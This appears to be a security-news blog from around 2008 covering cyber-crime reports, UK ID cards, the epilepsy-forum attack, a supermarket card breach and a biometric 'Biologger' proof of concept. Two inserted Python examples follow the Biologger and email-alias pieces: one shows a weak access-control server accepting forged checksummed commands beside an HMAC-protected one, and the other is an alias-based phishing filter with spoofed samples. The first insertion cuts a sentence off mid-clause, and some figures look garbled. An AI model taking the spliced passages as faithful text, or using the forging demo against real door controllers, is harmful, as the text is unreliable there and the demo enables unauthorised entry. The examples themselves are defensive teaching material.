In the end, however, money talks and you-know-what walks. The feds only have a $115 million budget to work with. Chertoff's department has requested $192 million for the new fiscal year but that's still doing it on the cheap. By comparison, we spend $720 million in Iraq each day.

Posted in | 0 comments

UK catching the US in the cyber-crime tables

The UK is catching up with the US as an internet crime hotspot, according to IT security consultancy Global Secure Systems (GSS).

GSS bases its warning on a study of the recently released Internet Crime Report by the Internet Crime Complaint Centre (IC3).

"Despite the fact that the IC3 study is a national US annual report, it concludes that the UK is in second position with 15.3 per cent when it comes to the origin of US internet crime reports," said David Hobson, managing director of GSS.

"This is significantly ahead of other cyber-crime hotspots such as Nigeria (5.7 per cent) and Romania (1.5 per cent). It's also worth noting that internet crime in the US hit an all-time high in 2007, with an almost 20 per cent increase on the fraud reported in 2006."

According to Hobson, reported internet crime losses are only the tip of the cyber-crime iceberg, as there are many more cases that go unreported for various reasons.

He added that the report should act as a "wake-up call" to companies that are not properly securing their networks from attack from the organised criminal gangs who are prowling the web searching for new targets.

"How they achieve their fraud is irrelevant. If they can find a way in, they will," he said.

According to the IC3 report, 90,008 complaints were referred to federal, state and local law enforcement agencies across the US.

According to Hobson: "That's around one complaint every six minutes throughout the year, day and night. If that statistic doesn't make a company IT manager sit up and take note, I don't know what will."

Posted in | 0 comments

Transcript disappears minister's 'hack-proof' ID register claim

At the end of February Home Office minister Meg Hillier explained the UK ID scheme security system to the Home Affairs Committee. "The National Identity Register, essentially," she said, "will be a secure database; ...hack-proof, not connected to the Internet... not be accessible online; any links with any other agency will be down encrypted links."

Except she didn't, apparently, because by the time the Committee session transcript was published, here, Hillier's words had become: "The National Identity Register, essentially, will be a secure database; it will not be accessible online; any links with any other agency will be down encrypted links."

Spooky? We are indebted to William Heath's Ideal Government blog for spotting the difference between what was actually said (noted at the time by an eyewitness) and what appeared in the official record. We should also explain at this point that Hansard, the UK parliamentary record system, is not intended to function as an entirely verbatim transcript of proceedings. It is largely verbatim, but includes some facility for publishing what the speaker meant to say, or perhaps even what they ought to have said.

Ordinarily, however, changes amount to little more than polishing and seldom materially affect the meaning. Ordinarily...

In this case, the removal of "hack-proof, not connected to the Internet" goes some way beyond minor polishing. Do we understand from this that Hillier's officials think it unwise (which, of course, it is) to claim that the NIR is hack-proof? And are they keen to leave wiggle-room on Internet connectivity? A database that is "not accessible online" is not necessarily the same thing as a database that is not connected to the Internet, depending on what you might mean by "not accessible".

Hillier is relatively new to the ID card brief at the Home Office, and has come up with several improbable and/or unfortunate claims in recent months (e.g., "we should see an identity card, like a passport, in country"). At the Committee session, Ideal Government reports that "the officials present were passing notes to try to get her back on message", which we would guess is just the sort of thing that's likely to prompt the acute observer to take especially careful notes. It's a tough job minding some people. ®

Posted in | 0 comments

Virginia, Illinois, and Texas all teaching Internet safety

Virginia became the first state this year to require Internet safety courses in its public schools. Illinois and Texas both have laws on the books relating to curriculum and instruction in this area, but Virginia is currently the only state to require such courses according to VNUNet.

As one student in the article pointed out,

James River High School student Maya Towers said: “I thought it was very important because we post a lot of things on the internet. I didn’t know how much information can be exposed.”

This highlights the attitudes of most of our students. While some conceal their identities on MySpace, Facebook, AOL, and other bits of social media, many others blithely post pictures, locations, and even phone numbers and addresses.

Now that my students have discovered Twitter, I’ve had to warn them about being too revealing in their tweets. Few realized that the growing network of followers (particularly for my feed) had access to any information they posted. Fortunately, most of my followers are either students or other folks interested in the educational value of social media. However, even these followers don’t need to know that Ashley and Susie are at the local movie theater alone and will be getting out at 9:45.

The level of naivete among many students is disturbing at best; well-planned curricula in the public schools could go a long way towards keeping us safe as we increasingly live a second life (no pun intended) online.

Posted in | 0 comments


YOUR COUNTRY NEEDS you, nerd, seemed to be US Homeland Security chief, Michael Chertoff’s message to Silicon Valley in his patriotic keynote speech at the RSA Conference in San Francisco yesterday.

Chertoff even went as far as saying that future cyber attacks could be on the scale of the attacks suffered by the US in 9/11, a desperate strategy attempting to appeal to the nationalism and conscience of Valley workers, as opposed to appealing to their wallets. (But, hang on, aren’t most of them foreign anyway?)

In what sounded more like a military troop rally, the security chief told the auditorium full of Valley workers to stand up and be counted in America’s fight to secure the cyber highway, noting "The human and economic sacrifices from a cyber-attack can be devastating ... on par with what this country experienced on September 11".

Taking out a small onion and with tears of patriotism in his eyes, he begged the private sector to "please send some of your brightest and best to do service in the government", referring to a new inter-agency group (National Cyber Security Center) set up to act as an early warning system for major network attacks that would help the federal government protect its computer networks from organised cyber attacks. He theatrically added that joining up would be "the best thing you can do for your country".

Chertoff thought it best to instill terror in his yuppie audience about the potential chaos that could be caused if cyber attacks were to hit financial or government bodies, melodramatically stating "a single individual, a small group or a nation state can exact damage and destruction similar to dropping a bomb or explosives."

Noting that the US government took threats to the online world as seriously as those in the real world, Chertoff also outlined government plans to develop the equivalent of the "Manhattan Project" to defend US federal networks and national security interests from the big bad boogey man of large-scale cyber-attacks.

Posted in | 0 comments

Coming up: the fingerprint-grabbing keylogger

A British researcher has developed a biometric keylogger of sorts that can capture fingerprints required to unlock building doors or gain access to computer networks or other restricted systems.

For now, the Biologger is a proof-of-concept aimed at showing the insecurity of many biometric systems, according to Matthew Lewis, who demonstrated the tool at last month's Black Hat Amsterdam conference. But the researcher, who works for Information Risk Management, warns the attack could become commonplace if current practices don't change and could be used to log images of retinas, facial features and any other physical characteristics used by biometric systems.

"Biometric device manufacturers and system integrators cannot rely on security through obscurity alone for the overall security of their devices and systems," he writes in this white paper (PDF). "Without adequate protection of the confidentiality, integrity and availability of biometric access control devices and their data, the threat of "Biologging" activities within those enterprises employing such access controls is real."

The unspecified access control device used in Lewis's demonstration didn't bother to encrypt data before sending it to back-end servers, making it ripe for interception by a man-in-the-middle laptop that logged all traffic passing between the two devices. The researcher was able to construct an image of a fingerprint by subjecting portions of the captured data to an algorithm designed to graphically identify image data and resolution.

"The result of such a finding to attackers could be significant," Lewis wrote. "If a good quality image can be reconstructed, then it is conceivable that techniques described ... could again be used to generate a 3D spoof finger of users that have obviously been registered with the system at some point."

The research is the latest cautionary reminder that biometrics are by no means a panacea to the difficulty of verifying a person's identity. Last week, a hacker club published what it said was the fingerprint of Wolfgang Schäuble, Germany's interior minister and an ardent supporter of storing a digital representation of citizens' fingerprints in their passports. Schäuble's print was embossed on a sticky piece of plastic that can leave the print on coffee cups, telephones and biometric readers.

Lewis was also able to issue commands to the access control device that enabled him to unlock doors and add new users with full administrative rights without presenting a fingerprint. That's because the device needed a single 8-byte message that passed over the network in plaintext. Although he was never able to crack a 2-byte checksum used for issuance of each message, he was able to overcome this limitation by taking a brute-force approach, in which every possible combination of checksums was used.

There are other limitations to Lewis's attack. For one, it requires attackers to have privileged access to the network connecting the access point to the server. Another is that the traffic was transmitted using the user datagram protocol, which rendered the brute-force attempts "not 100% reliable."

But his point seems to be that, just as best practices require that passwords are never stored in the clear, fingerprints and other biometric data should likewise be encrypted. Architects designing the next generation of biometric systems,
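The contrast the article draws, as an added example that is neither the researcher's code nor the device's protocol: a constructed 8-byte command carrying a 2-byte checksum beside the same command carrying an HMAC tag. The checksum formula, the command bytes and the shared key are all assumptions.

```python
"""A checksum on an access-control message is not authentication.

Added example, not the researcher's code or the device's protocol. It models,
in constructed form, the message shape the article describes: an 8-byte command
followed by a 2-byte checksum, sent in plaintext. The checksum formula (byte sum
modulo 2**16) is an assumption; the real device's formula is not public. Beside
it, the same command protected by an HMAC-SHA256 tag under a key that only the
reader and the server hold.
"""
import hashlib
import hmac
import secrets

COMMAND_LEN = 8
CHECKSUM_LEN = 2
CHECKSUM_SPACE = 2 ** (8 * CHECKSUM_LEN)   # 65,536 possible values, no secret involved
TAG_LEN = 32                                # HMAC-SHA256 output length


def checksum16(command: bytes) -> bytes:
    """Assumed checksum: sum of the bytes, modulo 2**16, big-endian."""
    return (sum(command) % CHECKSUM_SPACE).to_bytes(CHECKSUM_LEN, "big")


def frame_with_checksum(command: bytes) -> bytes:
    return command + checksum16(command)


def server_accepts_checksum(frame: bytes) -> bool:
    """The weak server: any well-formed frame whose checksum adds up is obeyed."""
    if len(frame) != COMMAND_LEN + CHECKSUM_LEN:
        return False
    command, chk = frame[:COMMAND_LEN], frame[COMMAND_LEN:]
    return hmac.compare_digest(chk, checksum16(command))


def frame_with_hmac(key: bytes, command: bytes) -> bytes:
    return command + hmac.new(key, command, hashlib.sha256).digest()


def server_accepts_hmac(key: bytes, frame: bytes) -> bool:
    """The hardened server: the tag must have been computed with the shared key."""
    if len(frame) != COMMAND_LEN + TAG_LEN:
        return False
    command, tag = frame[:COMMAND_LEN], frame[COMMAND_LEN:]
    expected = hmac.new(key, command, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected)  # constant-time comparison


def demo() -> dict:
    """Compare what each server accepts from a party that holds no credential."""
    legit_cmd = bytes.fromhex("0102000000000001")   # constructed: "unlock door 1"
    other_cmd = bytes.fromhex("0107000000000009")   # constructed: a different command
    key = secrets.token_bytes(32)                   # known to reader and server only

    # Anyone on the network path sees the legitimate frame in the clear. With
    # the checksum formula (or at worst 65,536 candidate values) a fresh frame
    # for another command passes the weak server, no fingerprint ever presented.
    unkeyed_frame = frame_with_checksum(other_cmd)
    # Against the HMAC server a keyless party can only attach an unkeyed digest
    # or a random tag; the 256-bit key space is not something to enumerate.
    unkeyed_tag_frame = other_cmd + hashlib.sha256(other_cmd).digest()

    return {
        "checksum_accepts_legit": server_accepts_checksum(frame_with_checksum(legit_cmd)),
        "checksum_accepts_unkeyed": server_accepts_checksum(unkeyed_frame),
        "hmac_accepts_legit": server_accepts_hmac(key, frame_with_hmac(key, legit_cmd)),
        "hmac_accepts_unkeyed": server_accepts_hmac(key, unkeyed_tag_frame),
        "checksum_values_possible": CHECKSUM_SPACE,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

An HMAC alone still lets an observed frame be replayed verbatim; a sequence number or nonce covered by the tag is the usual companion, left out here to keep the contrast with the bare checksum clear.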

Posted in | 0 comments

Homeland Security: We're ready to launch spy satellite office

A plan to expand the number of government police and security agencies that can tap into detailed satellite images is proceeding, despite concerns from Congress, the head of the U.S. Department of Homeland Security said Wednesday.

During a roundtable discussion with bloggers and journalists here, Secretary Michael Chertoff said a "charter has been signed" to create a new office, which will serve as a clearinghouse for requests from law enforcement, border security, and other domestic homeland security agencies to view feeds from powerful satellites. It will be called the National Applications Office.

"I think the way is now clear to stand (the office) up and go warm on it," said Chertoff at Homeland Security's headquarters here.

Right now, these spy satellites are more commonly used for things like monitoring volcanic activity, hurricanes, floods, and various environmental and geological shifts. But the agency has said it sees important applications for the images in other areas within its purview, such as terrorism investigations and illegal immigration busts.

Originally, the satellite office was supposed to take shape last October but those plans were delayed after congressional Democrats raised privacy concerns. They said they wouldn't be able to support the program until the agency lays out exactly what legal framework it will be using to fulfill requests by, say, state and local police, and how it will protect Americans' civil liberties.

Chertoff said Wednesday that the department has completed the privacy impact assessments for the new office and should be releasing them within a few days. He said that members of Congress have received briefings and that he thinks there's a "good process in place to make sure there aren't any legal transgressions."

In the past, Homeland Security officials have downplayed the implications of allowing more agencies to access the satellites, arguing that in addition to scientific applications, the technique has already been employed from time to time by the Secret Service and FBI. For instance, when a well-publicized series of sniper attacks swept through the Washington, D.C., area in October 2002, the CIA and FBI were permitted to use images provided by the National Geospatial Intelligence Agency to look for places snipers might hide along highways along the east coast.

"I think we have fully addressed everybody's concerns," Chertoff said Wednesday. "We've made it clear this is not going to be interception of communications, verbal or oral or written. That's still going to be done under the traditional way."

The Homeland Security secretary, however, may not have that easy a time persuading congressional overseers.

Within the next few days, Reps. Jane Harman (D-Calif.) and Christopher Carney (D-Penn.), who lead Homeland Security subcommittees, are planning to send Chertoff a letter that says the new scheme still isn't ready for launch, a Democratic aide to the U.S. House of Representatives Homeland Security Committee, which oversees the department, told CNET News.com on Wednesday.

Committee leaders say the charter for the National Applications Office is "wholly inadequate," said the aide, who spoke on condition of anonymity since the letter is still being drafted. They plan to criticize the department for allegedly failing to outline the legal framework and other "standard operating procedures" governing the program.

Furthermore, the Government Accountability Office has not yet vetted the program's privacy guidelines, which was made a condition for the National Applications Office to receive congressional funding, the aide said.

On cybersecurity
Also at the roundtable discussion, Chertoff attempted to defuse concerns that Homeland Security's cybersecurity arm plans to "sit on the Internet," as he put it, and monitor traffic in a manner reminiscent of the Chinese government.

As part of its efforts to detect network intrusions in real time, Homeland Security has said it plans to expand use of an existing system known as Einstein, which will, among other things, monitor visits from Americans and foreigners visiting .gov Web sites. The set-up is in place at 15 federal agencies, but Chertoff has asked for $293.5 million from Congress in next year's budget to roll it out governmentwide.

In addition to outfitting federal networks with those tools, Chertoff said the government also plans to help companies to fend off cyberattacks by offering some of its "classified" intrusion detection tools--but such aid will be purely optional.

As for the department's broader strategy, "in some ways, it's more and better of what we're doing," Chertoff said. "In some cases, it may involve some additional things I can't talk about."

Posted in | 0 comments

Mind the hack

Sidestep spammers with dedicated email accounts for online bills. By Andrew Brown.

Somewhere out there some firm that holds my credit-card details has been hacked. I know this because I have started to get spam to an email address I only ever use for buying things. I have no idea which firm it might be: in the past 212 years, I have had at least 520 messages to that address, from about 75 different companies. I don't think it's likely that any of the big ones has been hacked or else we would hear more of it. (Wouldn't we?) But among the software publishers, the music sites, the wine merchants and second-hand book dealers I have been paying from this address there is one whose customer database has been plundered.

Keeping specialised and unique email addresses for different tasks is one of those tricks that everyone should know and practice: for one thing, it can be combined with spam-filtering rules to make a rock-solid defence against phishing scams. Since I have unique addresses for eBay, PayPal, the various Amazons and my bank, none of which are ever used for other correspondence, I know that an email purporting to come from any of those firms that is not sent to the right private address must be a scam, and it's easy to set up rules to delete it unread. I have not done this with the correspondence for one-off purchases, all of which went to the address that has now become a spam target, because each new address would have to be set up in the spam filter.
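The filtering rule described above, worked through as an added example that is not the columnist's own setup: one alias per company, a message judged by whether its claimed sender and its delivery address agree, and one alias per one-off vendor so that spam names the vendor that leaked it. All addresses and brand domains are constructed.

```python
"""Per-vendor e-mail aliases as a phishing filter.

Added example, not code from the column. Everything here is constructed: the
aliases live under example.net and each one was handed to exactly one company.
Only the From and To headers are consulted.
"""
import email
from email.utils import parseaddr
from typing import Optional

# Dedicated alias -> the only sender domain that should ever write to it.
DEDICATED = {
    "ebay-x7@example.net": "ebay.com",
    "paypal-q2@example.net": "paypal.com",
    "amazon-k9@example.net": "amazon.co.uk",
    "bank-m4@example.net": "examplebank.co.uk",
}
PROTECTED_BRANDS = set(DEDICATED.values())

# One alias per one-off vendor: spam arriving at an alias names the vendor
# whose customer list was taken, which a single shared purchase address cannot.
VENDOR_ALIASES = {
    "wine-a1@example.net": "Example Wine Merchant",
    "books-b2@example.net": "Example Second-hand Books",
    "music-c3@example.net": "Example Music Store",
}


def _address(header_value: str) -> str:
    """Bare address from a header value, lower-cased ('' if absent)."""
    return parseaddr(header_value)[1].lower()


def _domain(header_value: str) -> str:
    """Domain part of an address header, lower-cased ('' if absent)."""
    return _address(header_value).rpartition("@")[2]


def _under(domain: str, brand: str) -> bool:
    """True for the brand domain or a real subdomain of it.

    mail.paypal.com passes; paypal.com.evil.example does not.
    """
    return domain == brand or domain.endswith("." + brand)


def classify(raw_message: str) -> str:
    """Return 'ok' or 'phish' for a message given as RFC 822 text."""
    msg = email.message_from_string(raw_message)
    to_addr = _address(msg.get("To", ""))
    from_dom = _domain(msg.get("From", ""))

    # Rule 1: a dedicated alias only ever hears from its own brand.
    if to_addr in DEDICATED:
        return "ok" if _under(from_dom, DEDICATED[to_addr]) else "phish"

    # Rule 2: mail claiming to come from a protected brand but delivered to any
    # other address cannot be genuine, because the brand only knows its alias.
    # From is under the sender's control, but a phish has to claim the brand,
    # and the sender does not know which alias that brand was given.
    if any(_under(from_dom, brand) for brand in PROTECTED_BRANDS):
        return "phish"
    return "ok"


def leaked_by(raw_message: str) -> Optional[str]:
    """Name the vendor whose alias received this (unsolicited) message, if any."""
    msg = email.message_from_string(raw_message)
    return VENDOR_ALIASES.get(_address(msg.get("To", "")))


# Constructed sample messages.
GENUINE = (
    "From: PayPal <service@paypal.com>\n"
    "To: paypal-q2@example.net\n"
    "Subject: Your receipt\n\nThanks for your payment.\n"
)
SPOOF = (  # right brand, wrong mailbox: the sender never knew the alias
    "From: PayPal Security <security@paypal.com>\n"
    "To: shop@example.net\n"
    "Subject: Verify your account\n\nClick here.\n"
)
LOOKALIKE = (  # right mailbox, wrong sender domain
    "From: security@paypal.com.evil.example\n"
    "To: paypal-q2@example.net\n"
    "Subject: Verify your account\n\nClick here.\n"
)
SPAM = (  # plain spam at a vendor alias: not a brand phish, but it names the leak
    "From: offers@pills.example\n"
    "To: wine-a1@example.net\n"
    "Subject: Special offer\n\n...\n"
)

if __name__ == "__main__":
    for name, m in [("GENUINE", GENUINE), ("SPOOF", SPOOF),
                    ("LOOKALIKE", LOOKALIKE), ("SPAM", SPAM)]:
        print(name, classify(m), leaked_by(m))
```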

The gang that stole my customer details is unlikely to be the same one that is sending me the spam. There are well-established marketplaces for email lists and the number of addresses for sale is hard to grasp: one moderate-sized botnet analysed by SecureWorks last year contained 162 million addresses. Many millions of these will be dead, of course; the spamming software has routines built into it to detect and delete addresses that have been blackholed, but messages that are instead bounced will keep the address alive.

There's nothing I can do, of course, other than keep a beady eye on my credit card and bank statements. But I do that anyway, and it will only detect damage after the event. In any case, I don't know whether my credit-card details are gone. On a well-designed site, they would be stored separately from the customer database; but a well-designed site wouldn't get hacked.

In the meantime, I skim-read the spam that drifts up in what used to be my private inbox, since Thunderbird's built-in spam filter is nothing like as efficient as Gmail's, or the one in Opera's mail module. There is a strange, twisted poetry of longing to discover here. The black economy of the internet has invented another criminal trade: alongside the programmers and the data thieves, there must be copywriters for the penis-enlargement pills. Perhaps someone, somewhere is publishing What Penis? magazine.

You'd have thought that after 10 years or more of pretty much continual spam there would be nothing fresh to say about enlargement pills, patches and creams. How can there be anyone out there who supposes that any of this will work? Yet the inexhaustible stream of spam proves that there must be hundreds of suckers born every minute.

Much of it seems written by people who don't speak English as a first language. But the awful thing is that all the circumlocutions are perfectly clear, because they speak to the universal fear of being a despised outcast. If you take the time to read the spam, it becomes clear that the market is the men's equivalent of anti-ageing creams for women: what is really being offered is the promise of being attractive, or at least not loathsome.

It may seem implausible to anyone over the age of 12 that a man whose tool bangs against his knees will be - whatever his other problems - irresistible to women. But the alternative explanation for a lack of success is that women are giggling behind your back at your pathetic, stunted personality. And that would be even worse.

Posted in | 0 comments

The Difference Between Feeling and Reality in Security

Security is both a feeling and a reality, and they're different. You can feel secure even though you're not, and you can be secure even though you don't feel it. There are two different concepts mapped onto the same word — the English language isn't working very well for us here — and it can be hard to know which one we're talking about when we use the word.

There is considerable value in separating out the two concepts: in explaining how the two are different, and understanding when we're referring to one and when the other. There is value as well in recognizing when the two converge, understanding why they diverge, and knowing how they can be made to converge again.

Some fundamentals first. Viewed from the perspective of economics, security is a trade-off. There's no such thing as absolute security, and any security you get has some cost: in money, in convenience, in capabilities, in insecurities somewhere else, whatever. Every time someone makes a decision about security — computer security, community security, national security — he makes a trade-off.

People make these trade-offs as individuals. We all get to decide, individually, if the expense and inconvenience of having a home burglar alarm is worth the security. We all get to decide if wearing a bulletproof vest is worth the cost and tacky appearance. We all get to decide if we're getting our money's worth from the billions of dollars we're spending combating terrorism, and if invading Iraq was the best use of our counterterrorism resources. We might not have the power to implement our opinion, but we get to decide if we think it's worth it.

Now we may or may not have the expertise to make those trade-offs intelligently, but we make them anyway. All of us. People have a natural intuition about security trade-offs, and we make them, large and small, dozens of times throughout the day. We can't help it: It's part of being alive.

Imagine a rabbit, sitting in a field eating grass. And he sees a fox. He's going to make a security trade-off: Should he stay or should he flee? Over time, the rabbits that are good at making that trade-off will tend to reproduce, while the rabbits that are bad at it will tend to get eaten or starve.

So, as a successful species on the planet, you'd expect that human beings would be really good at making security trade-offs. Yet, at the same time, we can be hopelessly bad at it. We spend more money on terrorism than the data warrants. We fear flying and choose to drive instead. Why?

The short answer is that people make most trade-offs based on the feeling of security and not the reality.

I've written a lot about how people get security trade-offs wrong, and the cognitive biases that cause us to make mistakes. Humans have developed these biases because they make evolutionary sense. And most of the time, they work.

Posted in | 0 comments

Home Office delay on hacking law continues

The government has further delayed the introduction of crucial legislation to criminalise new forms of hacking activities.

Laws to amend the 18-year-old Computer Misuse Act (CMA) were due this month, but have been put back as the Home Office tries to iron out potential conflicts in the legislation.

The updates are important because they target cyber crime techniques that were not envisaged when the act was first written, particularly denial of service attacks and the selling of hacking tools.

Amendments were first approved by parliament in the Police and Justice Act two years ago, but have not been implemented because of potential overlap with the Serious Crime Bill and a fear they might criminalise legitimate security professionals.

The legislation is needed urgently because the CMA has been so ineffective in tackling hacking, said shadow home affairs minister James Brokenshire.

“Further delays send out the message to criminals that the UK is a soft touch on cyber crime,” he said. “We need action.”

Denial of service attacks are becoming increasingly sophisticated. Last month, gambling company Gala Coral experienced a new breed of attack that disabled its network for almost half an hour, despite costly protection systems.

Even when the legislation comes into force there are no guarantees it will work, said MP John Hemming, who used to run an e-commerce site.

“The government often looks for simple solutions to complex situations and very often gets it wrong,” he said.

The Home Office said no date has been set for the commencement order.

“Work on legislation will begin in April; we are still considering when to bring in the legislation,” said a spokeswoman.

Posted in | 0 comments

UK web users fear privacy invasion

The UK public fears online fraud and privacy invasion but are ill-informed about the rules that protect them, according to research.

The Switched On report conducted by the Ofcom Consumer Panel - an independent body that advises the communications regulator - lists immoral web merchants as a key concern for internet users, along with paedophiles and people who lie on dating sites. Members of the public also told researchers that they felt "under siege" from web and telephone spam.

These worries present a serious issue for the communications technology sector, according to Anna Bradley, chair of the panel.

"Service providers, regulators and other policy makers need to give consumers greater confidence that the risks are well managed," said Bradley.

"In addition, we need to help consumers understand about the existing protections, make the residual risks clear to them and help them to make their own electronic environment safer."

Posted in | 0 comments

Hackers Assault Epilepsy Patients via Computer

Internet griefers descended on an epilepsy support message board last weekend and used JavaScript code and flashing computer animation to trigger migraine headaches and seizures in some users.

The nonprofit Epilepsy Foundation, which runs the forum, briefly closed the site Sunday to purge the offending messages and to boost security.

"We are seeing people affected," says Ken Lowenberg, senior director of web and print publishing at the Epilepsy Foundation. "It's fortunately only a handful. It's possible that people are just not reporting yet -- people affected by it may not be coming back to the forum so fast."

The incident, possibly the first computer attack to inflict physical harm on the victims, began Saturday, March 22, when attackers used a script to post hundreds of messages embedded with flashing animated GIFs.

The attackers turned to a more effective tactic on Sunday, injecting JavaScript into some posts that redirected users' browsers to a page with a more complex image designed to trigger seizures in both photosensitive and pattern-sensitive epileptics.

RyAnne Fultz, a 33-year-old woman who suffers from pattern-sensitive epilepsy, says she clicked on a forum post with a legitimate-sounding title on Sunday. Her browser window resized to fill her screen, which was then taken over by a pattern of squares rapidly flashing in different colors.

Fultz says she "locked up."

"I don't fall over and convulse, but it hurts," says Fultz, an IT worker in Coeur d'Alene, Idaho. "I was on the phone when it happened, and I couldn't move and couldn't speak."

After about 10 seconds, Fultz's 11-year-old son came over and drew her gaze away from the computer, then killed the browser process, she says.

"Everyone who logged on, it affected to some extent, whether by causing headaches or seizures," says Browen Mead, a 24-year-old epilepsy patient in Maine who says she suffered a daylong migraine after examining several of the offending posts. She'd lingered too long on the pages trying to determine who was responsible.

Circumstantial evidence suggests the attack was the work of members of Anonymous, an informal collective of griefers best known for their recent war on the Church of Scientology. The first flurry of posts on the epilepsy forum referenced the site EBaumsWorld, which is much hated by Anonymous. And forum members claim they found a message board thread -- since deleted -- planning the attack at 7chan.org, a group stronghold.

Fultz says the attack spawned an uncommonly bad seizure. "It was a spike of pain in my head," she says. "And the lockup, that only happens with really bad ones. I don't think I've had a seizure like that in about a year."

But she's satisfied with the Epilepsy Foundation's relatively fast response to the attack, about 12 hours after it began on Easter weekend. "We all really appreciate them for giving us this forum and giving us this place to find each other," she says.

Epilepsy affects an estimated 50 million people worldwide, about 3 percent of whom are photosensitive, meaning flashing lights and colors can trigger seizures.


Malware to blame in supermarket data breach

It turns out malware somehow found its way onto a Maine-based supermarket chain's servers, which led to the security breach announced earlier this month compromising up to 4.2 million credit cards.

Citing a letter the Hannaford grocer sent to Massachusetts regulators, The Boston Globe on Friday reported that the malicious software intercepted data from customers as they paid with plastic at checkout counters and sent data overseas.

The malware was installed on computer servers at each of the 300-some stores operated by Hannaford and its partners, the Globe reported.

The company is continuing its investigation into how the malware may have been placed on the servers. The Secret Service, meanwhile, is conducting its own investigation.

The breach appears to be one of the first in which credit card numbers were stolen while the information was in transit, or at the point of sale. One of a growing number of sophisticated attacks, it illustrates vulnerabilities in the communication between cash registers and branch servers, as Neal Krawetz of Hacker Factor Solutions has warned in research (PDF).

That mode contrasts with attacks on databases, the method used to compromise 45.7 million accounts over a two-year period in the breach of customer records at TJX Companies, the operator of the T.J. Maxx and Marshalls retail chains.

Andrew Conry of InformationWeek adds that Hannaford, in addition to the breach, has two related class action lawsuits on its hands alleging negligence in maintaining customer security. And he suggests that there might be some truth to the claims, noting that Hannaford should have noticed that "internal servers were transmitting outside the network to a strange IP. This should've raised flags somewhere--server logs, IDS logs, firewall logs."

I'll second Conry's conclusion: "In any case, the whole mess should be very instructional to retailers everywhere," particularly in light of Friday's news of attacks on top Web sites like USAToday.com, Target.com, ABCNews.com, Walmart.com, and of a data breach at Antioch University in Ohio.


Fujifilm bugs backup tapes with LoJack device

Fujifilm Recording Media has launched in the US a GPS tracking device for tape storage — the backup and archiving medium with a nasty habit of "disappearing" while in transit to remote sites.

Fujifilm Tape Tracker is a wireless device that fits discreetly into a standard half-inch tape cartridge. The company partnered with cargo monitoring firm SC-Integrity (SCI) to develop software that monitors the Fuji-bugged tapes as they move between data centers or disaster recovery locations. Data center admins can use a web-based application to locate the device on maps and satellite images.

Tape Tracker is based on LoJack InTransit, a system SCI developed with LoJack in 2006. According to Fujifilm, the software can set boundaries that will send alerts if the cargo strays from its route. The service also provides chain of custody history reports and 24/7 monitoring.

Using Fujifilm's digital snitch costs $150 per month through the company's resellers.

Fujifilm hopes to capitalize on tape archiving data breach scares, which pop up on a disturbingly consistent basis. Most recently, US retailer J.C. Penney had a backup tape allegedly stolen that included personal information belonging to more than 650,000 customers.


Flash flaw leads to Vista laptop's fall

It held out as long as possible, but a Windows Vista laptop fell to a determined bunch of hackers Friday evening at the Pwn to Own contest at CanSecWest.

Since it was the third day of the contest, which saw a MacBook Air get hacked on Thursday, the TippingPoint Zero Day Initiative relaxed the rules even further. On the first day of the contest, only the operating system could be targeted, but on the second day that was expanded to include standard applications. An undisclosed Safari flaw led to the MacBook Air's downfall.

But on Friday, hackers could target any "popular" piece of application software that you might find on a system. The Fujitsu laptop, running Vista Ultimate, was compromised by a previously undiscovered flaw in Adobe's Flash software.

Shane Macaulay, Derek Callaway and Alexander Sotirov gained control of the laptop, which also means they get to keep it. However, since the rules had been relaxed, they only get $5,000; the MacBook Air winners collected $10,000.

The contest rules stipulated that any winner sign a nondisclosure agreement immediately after a successful hack, so that the flaw could be reported to the vendor before being made public. Once Adobe and Apple have patched their flaws, the details will be disclosed.

A Sony Vaio laptop running Ubuntu remained unscathed at the end of the conference.


Awed fraudsters defeated by UK's passport interviews

Interviews for first time passport applicants have been massively successful - because, er, no fraudulent applications at all have been detected since the government introduced the system last May. In answer to a Freedom of Information request, the Home Office said last week that 38,391 interviews had been held to date, 222 applications were currently under investigation, but that so far no application had been rejected.

An Identity & Passport Service spokesman told the Press Association, optimistically, that interviews discouraged people from making false passport applications in the first place. He also claimed that IPS had detected 6,500 fraudulent passport applications last year. These will have been rejected before the interview stage, although not all will have been made by first time applicants.

But that 6,500 claim is a bit of a puzzle. In January of this year the Home Office Minister i/c identity, Meg Hillier, said that for the 11 months to 30 September 2006 IPS estimated that 0.25 per cent of passport applications, or 16,500 cases, were believed to be fraudulent. A further 1.61 per cent (105,000) included "some element of false declaration", but the identity and eligibility of these individuals "was not otherwise in doubt" (answer to Parliamentary question).

As IPS clearly differentiates between an "element of false declaration" and attempting to obtain a passport fraudulently, its definition of passport fraud obviously has some flexibility to it.

Answering another question in the same vein last July, Hillier said that IPS was then investigating "some 2,000 cases" of suspected fraud. Which puts the total of 222 interview-derived investigations into perspective. The Home Office has also claimed in the past that half of all fraudulent applications are made via the first time application process.

Doubts about the actual rates of fraud and detection are further reinforced by IPS figures, produced in answer to an FOIA request in August 2006. These put detected fraudulent applications at 1,126 in 2005, 1,880 in 2004 and 1,571 in 2003, the overall trend being downwards since 2001.

Obviously, not everybody can be right here. If the 6,500 detection number IPS is now claiming is genuine (i.e., not the consequence of a more brutal approach to the odd "element of false declaration"), then historically IPS must have been relatively useless at nicking passport fraud villains. If however IPS' estimate of 16,500 is correct, then the 6,500 actual detections indicate that IPS might not be as useless as it was, but that it is still fairly useless.

And the point of interviews? It seems bizarre that in ten months, interviewing almost 40,000 people, IPS has not been able to identify a single one as sufficiently obviously fraudulent to reject them. Are all the would-be first time fraudsters sufficiently smart to realise they'll be nicked if they apply? Or are all of them sufficiently smart to sail through the interview anyway? There really ought to be some kind of population in between these two extremes, and 222 doubtfuls doesn't look large enough to accommodate it.

According to Hillier, IPS is due to complete a sampling exercise similar to the one that produced the 2006 estimates next month. If the Home Office claims that half of all frauds were first time applications, and that the interview process deters frauds, are correct, then the numbers this time around - covering the first year of interviews - should be substantially down.

If not, then Tory and Liberal claims that the interview process, which involved setting up a network of 70 offices at a cost of £93 million, is an expensive waste of time will be borne out. Unless of course you were to view the interview centre network as softening the population up for mass biometric enrolment, starting 2012...


White House whinges to judge

THE WHITE HOUSE told a federal judge late last Friday that it shouldn't be ordered to copy hard drives to preserve its zillions of missing emails because it destroys the older computers that it replaces, that emails are missing is merely speculation and doing that would be too expensive and cause it too much work and it has a bit of a headache and is going for a lie down.

